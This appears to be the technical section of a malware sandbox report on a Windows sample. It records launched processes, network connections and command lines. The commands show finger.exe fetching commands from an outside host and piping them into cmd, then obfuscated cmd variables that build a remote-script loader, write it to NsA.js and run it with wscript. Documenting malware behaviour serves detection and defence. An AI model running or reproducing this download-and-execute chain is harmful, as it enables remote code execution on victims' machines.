Technical Information
Processes launched:
- '<SYSTEM32>\finger.exe' ok@ttaar4.moguor.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\NsA.js"
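File written to disk (the script that the cmd.exe commands listed further down write out and that wscript.exe then runs):
- %LOCALAPPDATA%\nsa.js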
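Network connections, given as host:port with host names partly masked in the report (port 79 is the Finger service port, which matches the finger.exe call):
- 'tt####.moguor.xyz':79
- 'be####.hedek.xyz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'tt####.moguor.xyz':79
- 'cl###flare.com':443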
- DNS ASK tt####.moguor.xyz
- DNS ASK be####.hedek.xyz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
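Command lines executed (the finger.exe response, with its leading lines skipped by `more +2`, is piped straight into cmd.exe; the later commands set obfuscated variables, strip the filler strings 1xJe and LWKWY from them, and redirect the result into %LOCALAPPDATA%\NsA.js before starting it):
- '<SYSTEM32>\cmd.exe' /c finger ok@ttaar4.moguor.xyz |more +2 |cmd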
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt DZDB=.j&&SEt UGYTF=v1xJear1xJe a =1xJe 'sc1xJeri1xJept1xJe:'; b =1xJe 'h1xJeTtP1xJe:'; G1xJeet1xJeObj1xJeec1xJet(1xJea+b+'&&sET 31XY=LWKWYLWKWYbeiie2.hedek.xyzLWKWY?1LWKWY')&&sEt/^p...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p T9P36="%UGYTF:1xJe=%%31XY:LWKWY=/%" 0<nul 1>%LOCALAPPDATA%\NsA%DZDB%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\NsA%DZDB%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\NsA.js